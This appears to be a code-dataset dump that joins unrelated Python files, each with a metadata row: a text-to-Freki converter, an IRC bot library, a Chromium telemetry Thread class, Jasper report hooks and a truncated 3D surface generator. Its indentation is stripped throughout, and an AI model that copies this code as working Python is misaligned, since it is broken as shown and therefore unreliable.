pre2post = {}
for line in re.split('\r\n|\n', text):
if not re.match('^\s*$', line):
pre2post[w_index] = wo_index
wo_index += 1
w_index += 1
line_dict = {}
s_index = 0
if span_text:
for line in span_text.split('\n'):
if len(line):
parts = line.split()
tags = parts[2:]
start = int(parts[0])
for i in range(start, int(parts[1]) + 1):
try:
num = pre2post[i]
except KeyError:
print("Warning: a line specified in the igt file is a blank line in the document. "
"Check the line numbers in the igt file. Skipping the problem line.")
break
line_dict[num] = (tags[num - start], 's' + str(s_index))
s_index += 1
frek = FrekiDoc()
text = re.sub(r'(\r\n|\n){2,}', '\n\n', text)
blocks = re.split('\n\n', text)
index = 1
b_index = 1
for para in blocks:
lines = re.split('\r\n|\n', para)
linenos = []
for line in lines:
f_line = FrekiLine(line)
f_line.attrs['line'] = index
linenos.append(index)
if index in line_dict:
f_line.attrs['tag'] = line_dict[index][0]
f_line.attrs['span_id'] = line_dict[index][1]
frek.add_line(f_line)
index += 1
block = FrekiBlock(linenos, linenos[0], linenos[-1], frek)
block._attrs['page'] = '1'
block._attrs['block_id'] = 'b' + str(b_index)
block._attrs['doc_id'] = doc_id
b_index += 1
frek.add_block(block)
return frek
def read_and_convert(path, igt_path=None, encoding='utf-8', detect_encoding=False):
"""
Read in a text file and convert it to freki. igt_path file format: startline endline tag1 tag2 ... tagN\n
:param path: path to the text file
:param igt_path: path to the text file containing IGT span info
:param encoding: name of the encoding of the file
:param detect_encoding: setting to true will first detect an encoding rather than using the default.
:return: freki object
"""
name = path.split('/')[-1].split('.')[0]
igt_text = None
if detect_encoding:
bytes = open(path, 'rb').read()
p_predict = chardet.detect(bytes)
text = codecs.open(path, encoding=p_predict['encoding'], errors='strict').read()
if igt_path:
i_predict = chardet.detect(open(igt_path, 'rb').read())
igt_text = codecs.open(igt_path, encoding=i_predict['encoding']).read()
logging.info('Using encoding: ' + p_predict['encoding'])
logging.info('Encoding detection uses the Chardet library: https://pypi.python.org/pypi/chardet')
else:
try:
text = codecs.open(path, encoding=encoding, errors='strict').read()
if igt_path:
igt_text = codecs.open(igt_path, encoding=encoding).read()
except UnicodeDecodeError:
bytes = open(path, 'rb').read()
p_predict = chardet.detect(bytes)
text = codecs.open(path, encoding=p_predict['encoding'], errors='strict').read()
if igt_path:
i_predict = chardet.detect(open(igt_path, 'rb').read())
igt_text = codecs.open(igt_path, encoding=i_predict['encoding']).read()
logging.info('The file cannot be read using encoding ' + encoding + '. Instead using ' + p_predict['encoding'])
logging.info('Encoding detection uses the Chardet library: https://pypi.python.org/pypi/chardet\n')
logging.info("If encoding " + p_predict['encoding'] + ' is not correct please specify the encoding as an argument')
logging.info('For a detailed list of encodings available in Python visit https://docs.python.org/2.4/lib/standard-encodings.html')
except LookupError:
print('Unknown encoding. If you want the system to automatically detect an encoding set detect_encoding=True')
print('For a detailed list of encodings available in Python visit https://docs.python.org/2.4/lib/standard-encodings.html')
raise
frek = convert_text(name, text, igt_text)
return frek
def main(arglist=None):
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description="Convert a plain text file to Freki format",
prog='text-to-freki',
epilog='examples:\n'
' text-to-freki in.txt out.freki --igtfile=igts.txt --detect-encoding=true'
)
parser.add_argument('infile', help='plain text file')
parser.add_argument('outfile', help='path to freki output file')
parser.add_argument('--igtfile', help='plain text file containing igt span info')
parser.add_argument('--encoding', default='utf-8', help='encoding of the input file')
parser.add_argument(
'-d', '--detect-encoding', dest='detect', default=False, help='automatically detects encoding when set to true'
)
parser.add_argument(
'-v', '--verbose',
action='count', dest='verbosity', default=2,
help='increase the verbosity (can be repeated: -vvv)'
)
args = parser.parse_args(arglist)
logging.basicConfig(level=50-(args.verbosity*10))
run(args)
if __name__ == '__main__':
main() | mit | 3,247,367,411,610,069,000 | 41.083333 | 142 | 0.592837 | false | 3.714899 | false | false | false |
deadc0de6/pyircbot | libirc.py | 1 | 18336 | # author: deadc0de6
# contact: https://github.com/deadc0de6
#
# python IRC library
#
# Copyright (C) 2015 deadc0de6
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ref:
# RFC 2812: https://tools.ietf.org/html/rfc2812
# https://www.alien.net.au/irc/irc2numerics.html
#
import socket
import ssl
import sys
import os
import time
import datetime
import string
import random
import threading
import signal
import select
import Queue
class libirc():
BUFLEN = 65535 # buffer to read IRC server message
DEBUG = False
LOGCHAT_NBLINE = 100 # per channel
CONN_TIMEOUT = 5 # second
SELECTTO = 1
ISOPER = False
SSL_CERT_PATH = '/etc/ssl/certs/ca-certificates.crt'
IRC_CMD_QUIT = 'quit'
IRC_CMD_PASS = 'pass'
IRC_CMD_JOIN = 'join' # <channel>
IRC_CMD_USER = 'user' # <username> <hostname> <servername> <realname>
IRC_CMD_NICK = 'nick' # <nickname>
IRC_CMD_PRIVMSG = 'privmsg' # <user> <message>
IRC_CMD_PING = 'ping'
IRC_CMD_PONG = 'pong'
IRC_CMD_LIST = 'list'
IRC_CMD_OPER = 'oper'
IRC_CMD_KICK = 'kick'
IRC_CMD_KILL = 'kill'
IRC_CMD_ERROR = 'error'
IRC_CMD_NAMES = 'names'
IRC_CMD_WHO = 'who'
IRC_CMD_NOTICE = 'notice'
IRC_CMD_CHANNEL = '321'
IRC_CMD_ACHANNEL = '322'
IRC_CMD_CHANNEL_END = '323'
IRC_CMD_MOTD = '375'
IRC_CMD_MTD_END = '376'
IRC_ERR_NICK = '433'
IRC_CMD_CHAN_NAMES = '353'
IRC_CMD_OPER_OK = '381'
# @host: irc server address
# @port: irc server port
# @ssl: use SSL (True) or not (False
# @nick: the bot nick
# @channel: the bot channel
# @threaded: is it to be threaded
# TODO really need the threaded option ??
def __init__(self, host, port, ssl, nick, channel, threaded=True):
self._server_host = host
self._server_port = port
self._server_ssl = ssl
self._nick = nick
self._orichannel = channel
self._threaded = threaded # call to callback are threaded
# some glob vars
self._pwd = None # server password
self._channels = [] # list of channels
self._conn_channels = [] # list of channels
self._nicks = [] # list of nicks on channels I'm on
self._connected = False
self._stop = False
self._logchat = False
self._logchat_logs = {} # for each channel name a list of exchange
self._sndqueue = Queue.Queue()
# callbacks
self._irc_event_on_message = None
self._irc_event_on_privmessage = None
self._irc_event_on_disconnect = None
self._irc_event_on_connect = None
self._irc_event_on_new_channel = None
self._irc_event_on_servping = None
self._irc_event_on_othermsg = None
self._irc_event_on_conn_channel = None
# dirty hack as SIG are not catched by the KeyboardInterrupt
signal.signal(signal.SIGINT, self._signal_handler)
def set_password(self, pwd):
self._pwd = pwd
# enable/disable the log chat features
# logs N lines of each channel it is on
def irc_set_logchat(self, boolean):
self._logchat = boolean
def set_callback(self, on_privmessage = None, on_message = None,\
on_disconnect = None, on_connect = None,\
on_new_channel = None, on_servping = None, on_othermsg = None,\
on_conn_chan = None):
self._irc_event_on_privmessage = on_privmessage
self._irc_event_on_message = on_message
self._irc_event_on_disconnect = on_disconnect
self._irc_event_on_connect = on_connect
self._irc_event_on_new_channel = on_new_channel
self._irc_event_on_servping = on_servping
self._irc_event_on_othermsg = on_othermsg
self._irc_event_on_conn_channel = on_conn_chan
def irc_listchannels(self):
if self._socket == None:
return False
self._irc_send_cmd(self.IRC_CMD_LIST, [])
return True
def irc_join_channel(self, chanstr):
if self._socket == None:
return False
if not chanstr in self._conn_channels:
self._irc_send_cmd(self.IRC_CMD_JOIN, [chanstr])
self._conn_channels.append(chanstr)
return True
# send a message to all channel I'm on
def irc_send_to_all_channels(self, msg):
for chan in self._conn_channels:
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [chan], [msg])
# send a message to a channel
def irc_channel_broadcast(self, chan, msg):
if not self._connected:
return False
if not chan in self._conn_channels:
return False
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [chan], [msg])
return True
# send a private message to a user
def irc_privmsg(self, user, msg):
if not self._connected:
return False
for i in msg.splitlines():
self._irc_send_cmd(self.IRC_CMD_PRIVMSG, [user], [i])
return True
# kill a user
def irc_kill(self, user, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self._irc_send_cmd(self.IRC_CMD_KILL, [user, reason])
return True
# kick user from all channels
def irc_kick_all(self, user, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self.irc_kick(user, '*', reason)
return True
# kick a user from a channel
# syntax: kick <channel> <user> <reason>
def irc_kick(self, user, channel, reason):
if not self._connected:
return False
if not self.ISOPER:
return False
self._irc_send_cmd(self.IRC_CMD_KICK, [user, channel, reason])
return True
# do we know this user
def irc_known_nick(self, user):
return (user in self._nicks)
# 0 means all line
def irc_get_chan_logs(self, chan, nbline=0):
nbline = int(nbline)
if not self._logchat:
return None
if not chan in self._logchat_logs:
return None
if nbline == 0 or nbline > len(self._logchat_logs[chan]):
return self._logchat_logs[chan]
else:
tmp = self._logchat_logs[chan][-nbline:]
return tmp
def _signal_handler(self, signum, frame):
self._stop = True
# timestamp to string
def _ts2str(self, ts):
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts))
# print debug message
def _irc_debug(self, txt):
datestr = self._ts2str(time.time())
sys.stderr.write("[IRC] <" + datestr + "> " + txt + "\n")
# print error message
def _irc_err(self, txt):
sys.stderr.write("[IRC ERROR] " + txt)
# this is the main loop reading from the socket
def _irc_read_loop(self):
success = True
self._irc_debug('bot started (read loop started) ....')
self._socket.setblocking(0)
try:
while not self._stop:
try:
wsocks = []
rsocks = [self._socket]
esocks = [self._socket]
if not self._sndqueue.empty():
wsocks.append(self._socket)
iready,oready,eready = select.select(rsocks, wsocks, esocks,
self.SELECTTO)
if self._socket in eready:
self._irc_debug('[ERROR] socket error in select')
if self._socket in oready and not self._sndqueue.empty():
data = self._sndqueue.get()
self._socket.send(data)
if self._socket in iready:
data = self._socket.recv(self.BUFLEN)
for line in data.splitlines():
if not self._irc_handle_line(line):
# not very resilient
success = False
break
if not success:
break
except socket.error as serr:
#pass
# TODO
self._irc_err('socket error')
print serr
except select.error as serr:
#pass
# TODO
self._irc_err('select error')
print serr
except KeyboardInterrupt:
print 'interrupted ...'
self._irc_debug('bot ended (read loop exited)')
return success
# handle anything that appears on the IRC and that I see
def _irc_handle_line(self, line):
if line == None or line == '':
return True
#try:
if self.DEBUG:
self._irc_debug("<- " + line)
# TODO from here
msg = ircmsg(line)
if msg.cmd == self.IRC_CMD_CHANNEL:
# start of channel list
self._irc_debug('start of channel listing')
elif msg.cmd == self.IRC_CMD_CHANNEL_END:
# end of channel list
self._irc_debug('end of channel listing')
elif msg.cmd == self.IRC_CMD_ACHANNEL:
# new channel
self._irc_debug('<- new channel: %s' % (msg.param[1]))
self._channels.append(msg.param[1])
if self._irc_event_on_new_channel != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_new_channel,
args=(msg.param[1],))
t.start()
else:
self._irc_event_on_new_channel(name)
elif msg.cmd == self.IRC_CMD_MTD_END:
# end of MOTD
self._irc_debug('joining channel: %s' % (self._orichannel))
self._connected = True
self.irc_join_channel(self._orichannel)
elif msg.cmd == self.IRC_CMD_OPER_OK:
self.ISOPER = True
elif msg.cmd == self.IRC_ERR_NICK:
# nick registration error
self._nick = self._nick + "^"
self._irc_debug('changing nick to: %s' % (self._nick))
self._irc_send_cmd(self.IRC_CMD_NICK, [self._nick])
elif msg.cmd == self.IRC_CMD_PING:
# this is a PING from server
self._irc_debug('<- \"ping\"')
self._irc_send_cmd(self.IRC_CMD_PONG, [msg.src])
if self._irc_event_on_servping != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_servping)
t.start()
else:
self._irc_event_on_servping()
elif msg.cmd == self.IRC_CMD_PRIVMSG and msg.param[0] == self._nick:
# this is a private message sent to myself
self._irc_debug('<- private message to me')
if self._irc_event_on_privmessage != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_privmessage, args=(msg,))
t.start()
else:
self._irc_event_on_privmessage(msg)
elif msg.cmd == self.IRC_CMD_PRIVMSG and msg.param[0] != self._nick:
# this is a message sent to a channel I'm on
self._irc_debug('<- message in channel: %s' % (msg.param[0]))
if self._irc_event_on_message != None:
if self._logchat:
self._irc_log(msg)
if self._threaded:
t = threading.Thread(target=self._irc_event_on_message, args=(msg,))
t.start()
else:
self._irc_event_on_message(msg)
elif msg.cmd == self.IRC_CMD_JOIN:
if msg.user != self._nick:
# another user join our channel
self._nicks.append(msg.user)
else:
if msg.msg[0] in self._conn_channels:
if self._irc_event_on_conn_channel != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_conn_channel,
args=(msg.msg[0],))
t.start()
else:
self._irc_event_on_conn_channel(msg.msg[0])
elif msg.cmd == self.IRC_CMD_CHAN_NAMES:
# list of names in the channel
for u in msg.msg:
if not u in self._nicks and u != self._nick:
self._nicks.append(u)
self._irc_debug('nicks list updated: %s' % (','.join(self._nicks)))
elif msg.cmd == self.IRC_CMD_ERROR:
# oops some error
self._irc_debug('ERROR ! (%s)' % (' '.join(msg.msg)))
return False
elif msg.cmd == self.IRC_CMD_NOTICE:
# this is a notice
self._irc_debug('notice received: %s %s' % (msg.param[0],
' '.join(msg.msg)))
if self._irc_event_on_othermsg != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_othermsg,
args=(msg,))
t.start()
else:
self._irc_event_on_othermsg(msg)
else:
# this is what's left
#self._irc_debug('other message received: %s' % (msg.cmd))
if self._irc_event_on_othermsg != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_othermsg,
args=(msg,))
t.start()
else:
self._irc_event_on_othermsg(msg)
#except Exception as msg:
# print msg
# exc_type, exc_obj, exc_tb = sys.exc_info()
# fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
# print exc_type, fname, exc_tb.tb_lineno
# return False
return True
def _irc_log(self, ircmsg):
user = ircmsg.user
chan = ircmsg.param[0]
msg = ' '.join(ircmsg.msg)
if chan in self._logchat_logs:
tmp = self._logchat_logs[chan]
if len(self._logchat_logs) > self.LOGCHAT_NBLINE:
# remove one
del tmp[0]
tmp.append('[%s] %s' % (user, msg))
self._logchat_logs[chan] = tmp
else:
l = ['[%s] %s' % (user, msg)]
self._logchat_logs[chan] = l
# send an IRC command to the server
# if txt is true, it accepts space in message (last part)
# usually for command use txt=False and for message use txt=True
def _irc_send_cmd(self, cmd, params, msg=[], log=True):
if self._socket == None:
return False
data = '%s %s' % (cmd, ' '.join(params))
if msg != []:
data += ' :%s' % (' '.join(msg))
data += '\n'
if log:
self._irc_debug('-> \"%s\"' % (data.rstrip()))
self._sndqueue.put(data)
return True
# connect to IRC server
def irc_connect(self):
sock = None
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
if self._server_ssl:
# https://docs.python.org/2/library/ssl.html
sock = ssl.wrap_socket(s, server_side=False)
else:
sock = s
sock.settimeout(self.CONN_TIMEOUT)
sock.connect((self._server_host, int(self._server_port)))
sock.settimeout(None)
except socket.error as err:
self._irc_err("Connection error: ")
print err
if self._server_ssl:
sock.unwrap()
sock.close()
return False
self._irc_debug("IRC socket connected!")
self._socket = sock
if self._irc_event_on_connect != None:
self._irc_debug('calling connect callback ...')
if self._threaded:
t = threading.Thread(target=self._irc_event_on_connect)
t.start()
else:
self._irc_event_on_connect()
#self._irc_debug('calling read-loop ...')
#t = threading.Thread(target=self._irc_read_loop)
#t.start()
# conn and nick
time.sleep(1)
self._irc_debug('sending nick and other information to the server ...')
self._irc_send_cmd(self.IRC_CMD_PASS, [self._pwd], log=False)
self._irc_send_cmd(self.IRC_CMD_USER, [self._nick, self._nick, self._nick], [self._nick], log=False)
self._irc_send_cmd(self.IRC_CMD_NICK, [self._nick], log=False)
# start the read loop
self._irc_debug('calling read-loop ...')
res = self._irc_read_loop()
try:
if self._server_ssl:
self._socket.unwrap()
except:
pass
self._socket.close()
return res
def irc_gooper(self, username, password):
if username != '' and password != '':
self._irc_debug('going operator ...')
self._irc_send_cmd(self.IRC_CMD_OPER, [username, password], log=False)
# disconnect to IRC server and close socket
def irc_disconnect(self):
# first send the quit command
self._irc_debug('disconnecting ...')
self._stop = True
if self._socket != None or not self._connected:
self._irc_debug("sending the IRC quit command !")
self._irc_send_cmd(self.IRC_CMD_QUIT, [])
# close the socket
if self._socket != None:
self._socket.close()
self._irc_debug('calling disconnect callback...')
if self._irc_event_on_disconnect != None:
if self._threaded:
t = threading.Thread(target=self._irc_event_on_disconnect)
t.start()
else:
self._irc_event_on_disconnect()
class ircmsg():
DEBUG = False
def __init__(self, line):
self._line = line
self.user = '' # the user that sent the message
self.src = '' # the address of the user (username@IP)
self.cmd = '' # the IRC command in the message
self.param = [] # the target of the message (#<channel> or user)
self.msg = [] # the message
self._parse_line()
# this is a naive parser
def _parse_line(self):
# format:
# :<prefix> <command> <params> :<trailing>
#try:
# identify the parts
if self.DEBUG:
self._err('full line: \"%s\"' % (self._line))
prefixend = 0
trailingstart = len(self._line)
if self._line.startswith(':'):
# prefix
dummy = self._line[1:]
prefix = dummy.split(' ')[0]
prefixend = len(prefix)+1
if '!' in prefix:
self.user = prefix.split('!')[0].lower()
self.src = prefix.split('!')[1].lower()
else:
self.src = prefix
if self.DEBUG:
self._err('prefix: %s' % (prefix))
if ' :' in self._line:
# trailing
trailing = self._line.split(' :')[1]
trailingstart = self._line.index(' :')
if self.DEBUG:
self._err('trailing: %s' % (trailing))
self.msg = [x.lower() for x in trailing.split(' ')]
cmdparams = self._line[prefixend:trailingstart].strip()
if self.DEBUG:
self._err('cmdparams: %s' % (cmdparams))
self.cmd = cmdparams.split(' ')[0].lower()
self.param = [x.lower() for x in cmdparams.split(' ')[1:]]
#except:
# self._err(self._line)
if self.DEBUG:
self.print_msg()
def _err(self, string):
sys.stderr.write('[IRCMSG] %s\n' % (string))
def print_msg(self):
self._err('Message (%s)' % (self._line))
self._err('\tuser: %s' % (self.user))
self._err('\tsrc: %s' % (self.src))
self._err('\tcmd: %s' % (self.cmd))
self._err('\tparam: %s' % (','.join(self.param)))
self._err('\tmsg: %s' % (','.join(self.msg)))
| gpl-2.0 | -3,772,198,053,339,212,000 | 31.39576 | 104 | 0.602694 | false | 3.322943 | false | false | false |
endlessm/chromium-browser | third_party/catapult/telemetry/telemetry/timeline/thread.py | 1 | 9786 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import telemetry.timeline.async_slice as async_slice_module
import telemetry.timeline.event_container as event_container
import telemetry.timeline.flow_event as flow_event_module
import telemetry.timeline.sample as sample_module
import telemetry.timeline.slice as slice_module
class Thread(event_container.TimelineEventContainer):
"""A Thread stores all the trace events collected for a particular
thread. We organize the synchronous slices on a thread by "subrows," where
subrow 0 has all the root slices, subrow 1 those nested 1 deep, and so on.
The asynchronous slices are stored in an AsyncSliceGroup object.
"""
def __init__(self, process, tid):
super(Thread, self).__init__('thread %s' % tid, parent=process)
self.tid = tid
self._async_slices = []
self._flow_events = []
self._samples = []
self._toplevel_slices = []
self._all_slices = []
# State only valid during import.
self._open_slices = []
self._newly_added_slices = []
@property
def toplevel_slices(self):
return self._toplevel_slices
@property
def all_slices(self):
return self._all_slices
@property
def samples(self):
return self._samples
@property
def async_slices(self):
return self._async_slices
@property
def open_slice_count(self):
return len(self._open_slices)
def IterChildContainers(self):
return
yield # pylint: disable=unreachable
def IterEventsInThisContainer(self, event_type_predicate, event_predicate):
if event_type_predicate(slice_module.Slice):
for s in self._newly_added_slices:
if event_predicate(s):
yield s
for s in self._all_slices:
if event_predicate(s):
yield s
if event_type_predicate(async_slice_module.AsyncSlice):
for async_slice in self._async_slices:
if event_predicate(async_slice):
yield async_slice
for sub_slice in async_slice.IterEventsInThisContainerRecrusively():
if event_predicate(sub_slice):
yield sub_slice
if event_type_predicate(flow_event_module.FlowEvent):
for flow_event in self._flow_events:
if event_predicate(flow_event):
yield flow_event
if event_type_predicate(sample_module.Sample):
for sample in self._samples:
if event_predicate(sample):
yield sample
def AddSample(self, category, name, timestamp, args=None):
if len(self._samples) and timestamp < self._samples[-1].start:
raise ValueError(
'Samples must be added in increasing timestamp order')
sample = sample_module.Sample(
self, category, name, timestamp, args=args)
self._samples.append(sample)
def AddAsyncSlice(self, async_slice):
self._async_slices.append(async_slice)
def AddFlowEvent(self, flow_event):
self._flow_events.append(flow_event)
def BeginSlice(self, category, name, timestamp, thread_timestamp=None,
args=None):
"""Opens a new slice for the thread.
Calls to beginSlice and endSlice must be made with
non-monotonically-decreasing timestamps.
* category: Category to which the slice belongs.
* name: Name of the slice to add.
* timestamp: The timetsamp of the slice, in milliseconds.
* thread_timestamp: Thread specific clock (scheduled) timestamp of the
slice, in milliseconds.
* args: Arguments associated with
Returns newly opened slice
"""
if len(self._open_slices) > 0 and timestamp < self._open_slices[-1].start:
raise ValueError(
'Slices must be added in increasing timestamp order')
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
self._open_slices.append(new_slice)
new_slice.did_not_finish = True
self.PushSlice(new_slice)
return new_slice
def EndSlice(self, end_timestamp, end_thread_timestamp=None):
""" Ends the last begun slice in this group and pushes it onto the slice
array.
* end_timestamp: Timestamp when the slice ended in milliseconds
* end_thread_timestamp: Timestamp when the scheduled time of the slice ended
in milliseconds
returns completed slice.
"""
if not len(self._open_slices):
raise ValueError(
'EndSlice called without an open slice')
curr_slice = self._open_slices.pop()
if end_timestamp < curr_slice.start:
raise ValueError(
'Slice %s end time is before its start.' % curr_slice.name)
curr_slice.duration = end_timestamp - curr_slice.start
# On Windows, it is possible to have a value for |end_thread_timestamp|
# but not for |curr_slice.thread_start|, because it takes some time to
# initialize the thread time timer.
if curr_slice.thread_start != None and end_thread_timestamp != None:
curr_slice.thread_duration = (end_thread_timestamp -
curr_slice.thread_start)
curr_slice.did_not_finish = False
return curr_slice
def PushCompleteSlice(self, category, name, timestamp, duration,
thread_timestamp, thread_duration, args=None):
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
if duration is None:
new_slice.did_not_finish = True
else:
new_slice.duration = duration
new_slice.thread_duration = thread_duration
self.PushSlice(new_slice)
return new_slice
def PushMarkSlice(
self, category, name, timestamp, thread_timestamp, args=None):
new_slice = slice_module.Slice(self, category, name, timestamp,
thread_timestamp=thread_timestamp,
args=args)
self.PushSlice(new_slice)
return new_slice
def PushSlice(self, new_slice):
self._newly_added_slices.append(new_slice)
return new_slice
def AutoCloseOpenSlices(self, max_timestamp, max_thread_timestamp):
for s in self._newly_added_slices:
if s.did_not_finish:
s.duration = max_timestamp - s.start
assert s.duration >= 0
if s.thread_start != None:
s.thread_duration = max_thread_timestamp - s.thread_start
assert s.thread_duration >= 0
self._open_slices = []
def IsTimestampValidForBeginOrEnd(self, timestamp):
if not len(self._open_slices):
return True
return timestamp >= self._open_slices[-1].start
def FinalizeImport(self):
self._BuildSliceSubRows()
def _BuildSliceSubRows(self):
"""This function works by walking through slices by start time.
The basic idea here is to insert each slice as deep into the subrow
list as it can go such that every subslice is fully contained by its
parent slice.
Visually, if we start with this:
0: [ a ]
1: [ b ]
2: [c][d]
To place this slice:
[e]
We first check row 2's last item, [d]. [e] wont fit into [d] (they dont
even intersect). So we go to row 1. That gives us [b], and [d] wont fit
into that either. So, we go to row 0 and its last slice, [a]. That can
completely contain [e], so that means we should add [e] as a subslice
of [a]. That puts it on row 1, yielding:
0: [ a ]
1: [ b ][e]
2: [c][d]
If we then get this slice:
[f]
We do the same deepest-to-shallowest walk of the subrows trying to fit
it. This time, it doesn't fit in any open slice. So, we simply append
it to row 0 (a root slice):
0: [ a ] [f]
1: [ b ][e]
"""
def CompareSlices(s1, s2):
if s1.start == s2.start:
# Break ties by having the slice with the greatest
# end timestamp come first.
return cmp(s2.end, s1.end)
return cmp(s1.start, s2.start)
assert len(self._toplevel_slices) == 0
assert len(self._all_slices) == 0
if not len(self._newly_added_slices):
return
self._all_slices.extend(self._newly_added_slices)
sorted_slices = sorted(self._newly_added_slices, cmp=CompareSlices)
root_slice = sorted_slices[0]
self._toplevel_slices.append(root_slice)
for s in sorted_slices[1:]:
if not self._AddSliceIfBounds(root_slice, s):
root_slice = s
self._toplevel_slices.append(root_slice)
self._newly_added_slices = []
def _AddSliceIfBounds(self, root, child):
"""Adds a child slice to a root slice its proper row.
Return False if the child slice is not in the bounds
of the root slice.
Because we know that the start time of child is >= the start time
of all other slices seen so far, we can just check the last slice
of each row for bounding.
"""
# The source trace data is in microseconds but we store it as milliseconds
# in floating-point. Since we can't represent micros as millis perfectly,
# two end=start+duration combos that should be the same will be slightly
# different. Round back to micros to ensure equality below.
child_end_micros = round(child.end * 1000)
root_end_micros = round(root.end * 1000)
if child.start >= root.start and child_end_micros <= root_end_micros:
if len(root.sub_slices) > 0:
if self._AddSliceIfBounds(root.sub_slices[-1], child):
return True
child.parent_slice = root
root.AddSubSlice(child)
return True
return False
| bsd-3-clause | -2,363,025,247,585,198,600 | 35.514925 | 80 | 0.647456 | false | 3.912835 | false | false | false |
saguas/jasper_erpnext_report | jasper_erpnext_report/utils/jasper_iter_hooks.py | 1 | 1437 | from __future__ import unicode_literals
__author__ = 'luissaguas'
import frappe
from frappe import _
"""
HOOKS:
jasper_after_sendmail(data, url, file_name, file_path); jasper_before_sendmail(data, file_name, output, url, **kargs);
jasper_after_get_report(file_name, file_output, url, filepath); jasper_before_get_report(data);
jasper_after_list_for_doctype(doctype, docnames, report, lista); jasper_before_list_for_doctype(doctype, docnames, report);
jasper_after_list_for_all(lista); jasper_before_list_for_all();
jasper_scriptlet(JavaScriptlet, ids=None, data=None, cols=None, doctype=None, docname=None);
"""
class JasperHooks:
def __init__(self, hook_name, docname=None, fallback=None):
self.hook_name = hook_name
self.current = 0
self.methods = frappe.get_hooks().get(self.hook_name) or (fallback if fallback is not None else [])
if isinstance(self.methods, dict):
if docname in self.methods.keys():
self.methods = self.methods[docname]
else:
self.methods = fallback if fallback is not None else []
self.methods_len = len(self.methods)
def __iter__(self):
return self
def next(self):
if self.current >= self.methods_len:
raise StopIteration
else:
return self.get_next_jasper_hook_method()
def get_next_jasper_hook_method(self):
if self.methods_len > 0:
curr_method = frappe.get_attr(self.methods[self.current])
self.current += 1
return curr_method
return None
| mit | 6,848,915,279,601,715,000 | 30.933333 | 125 | 0.712596 | false | 2.932653 | false | false | false |
tbtraltaa/medianshape | medianshape/simplicial/surfgen.py | 1 | 10038 | # encoding: utf-8
'''
2D surface embedded in 3D
-------------------------
'''
from __future__ import absolute_import
import importlib
import os
import numpy as np
from medianshape.simplicial import pointgen3d, mesh, utils
from medianshape.simplicial.meshgen import meshgen2d
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
from medianshape.viz import plot2d, plot3d
from distmesh.plotting import axes_simpplot3d
from medianshape.simplicial.utils import boundary_points
def func(x, y, sign=1):
'''
:math:`\sin\pi x \cos \pi y`.
'''
return np.sin(np.pi*x)*np.cos(np.pi*y)
def sample_surf(scale, step=0.2):
'''
Returns a tuple X, Y, Z of a surface for an experiment.
'''
x = y = np.arange(-4.0, 4.0, step)
X, Y = np.meshgrid(x, y)
from matplotlib.mlab import bivariate_normal
'''
Z1 = bivariate_normal(X, Y, 1.0, 1.0, 0.0, 0.0)
Z2 = bivariate_normal(X, Y, 1.5, 0.5, 1, 1)
#Z3 = bivariate_normal(X, Y, 1, 1, -2, -2)
Z = Z2 - Z1
'''
# Ups
ZU1 = bivariate_normal(X,Y, 1.5, 1, 0,-2)
ZU2 = bivariate_normal(X, Y, 1.5, 1.5, 4, 1)
ZU3 = bivariate_normal(X, Y, 1, 1, -4, 1)
#ZU4 = bivariate_normal(X, Y, 1.5, 1.5, -4, -4)
#ZU5 = bivariate_normal(X, Y, 1, 1, 4, -4)
ZU4 = bivariate_normal(X, Y, 4, 0.5, 0, -4)
# Downs
ZD1 = bivariate_normal(X, Y, 1.5, 1, 0, 1)
ZD2 = bivariate_normal(X, Y, 1.5, 1.5, -4, -2)
ZD3 = bivariate_normal(X, Y, 1, 1, 4, -2)
ZD4 = bivariate_normal(X, Y, 4, 1, 0, 4)
Z1 = ZU1 + ZU2 + ZU3 - ZD1 - ZD2 - ZD3 - ZD4
Zmax1 = np.abs(np.amax(Z1))
Z1 = Z1/Zmax1 * scale[2]
# Visualization
fig = plt.figure()
ax = fig.gca(projection="3d")
surf = ax.plot_surface(X, Y, Z1, rstride=1, cstride=1, cmap=cm.winter,
linewidth=0, antialiased=False)
plt.show()
# Ups
ZU1 = bivariate_normal(X,Y, 2, 1, 1,1)
ZU2 = bivariate_normal(X, Y, 3, 1, -2, 4)
ZU3 = bivariate_normal(X, Y, 1.5, 1.5, -2, -2)
#ZU4 = bivariate_normal(X, Y, 1.5, 1.5, -4, -4)
#ZU5 = bivariate_normal(X, Y, 1, 1, 4, -4)
ZU4 = bivariate_normal(X, Y, 2, 2, 3, -4)
# Downs
ZD1 = bivariate_normal(X, Y, 1, 2, 4, 2)
ZD2 = bivariate_normal(X, Y, 1.5, 1.5, -2, 2)
ZD3 = bivariate_normal(X, Y, 1.5, 1.5, 1, -2)
ZD4 = bivariate_normal(X, Y, 4, 1, 0, -4)
Z2 = ZU1 + ZU2 + ZU3 - ZD1 - ZD2 - ZD3 - ZD4
Zmax2 = np.abs(np.amax(Z2))
Z2 = Z2/Zmax2 * scale[2]
X = X * scale[0]/4.0
